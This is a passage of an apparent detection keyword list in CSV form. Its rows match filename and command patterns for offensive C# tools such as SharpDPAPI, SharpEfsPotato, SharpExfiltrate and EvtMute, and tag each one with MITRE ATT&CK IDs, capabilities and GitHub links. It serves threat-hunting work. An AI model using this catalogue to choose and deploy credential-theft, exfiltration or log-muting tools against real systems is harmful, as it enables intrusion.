fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDcomTrigger.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpDir.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDllProxy*,offensive_tool_keyword,SharpDllProxy,Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading,T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/Flangvik/SharpDllProxy,1,1,N/A,N/A,6,565,76,2020-07-21T17:14:01Z,2020-07-12T10:46:48Z -*SharpDomainSpray*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpDomainSpray.*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpDomainSpray-master*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z 
-*SharpDoor.exe*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*SharpDoor-master*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*SharpDPAPI backupkey*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpDPAPI* credentias *,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI* vaults *,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z 
-*SharpDPAPI.csproj*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.Domain*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDPAPI.exe*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.ps1*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.sln*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - 
T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.txt*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPIMachine*.cs,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpDPAPI-master*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDXWebcam*,offensive_tool_keyword,SharpDXWebcam,Utilizing DirectX and DShowNET assemblies to record video from a host's webcam,T1123 - T1059.001 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/snovvcrash/SharpDXWebcam,1,1,N/A,8,1,68,10,2023-07-19T21:09:00Z,2023-07-12T03:26:24Z -*sharpedrchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpEDRChecker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpEfsPotato by @bugch3ck*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.cs*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.exe*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.sln*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato-master*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege 
Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsTriggeEfs.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharPersist*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,1,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*SharPersist.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpEventLoader*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,1,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*SharpEventPersist*,offensive_tool_keyword,cobaltstrike,Persistence by writing/reading shellcode from Event Log,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/improsec/SharpEventPersist,1,1,N/A,10,10,348,50,2022-05-27T14:52:02Z,2022-05-20T14:52:56Z -*SharpEvtMute.cs*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event 
logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.exe*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.pdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpEvtMute.sln*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*SharpExcelibur*,offensive_tool_keyword,cobaltstrike,Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpExcelibur,1,1,N/A,10,10,85,19,2021-07-20T04:56:55Z,2021-07-16T19:48:45Z -*sharp-exec *,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpExfiltrate.csproj*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate.exe*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate.sln*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrateLootCache*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data 
Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*SharpExfiltrate-main*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*sharp-fexec *,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpFtpC2*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command 
and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*SharpGen.dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.enable_cache*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
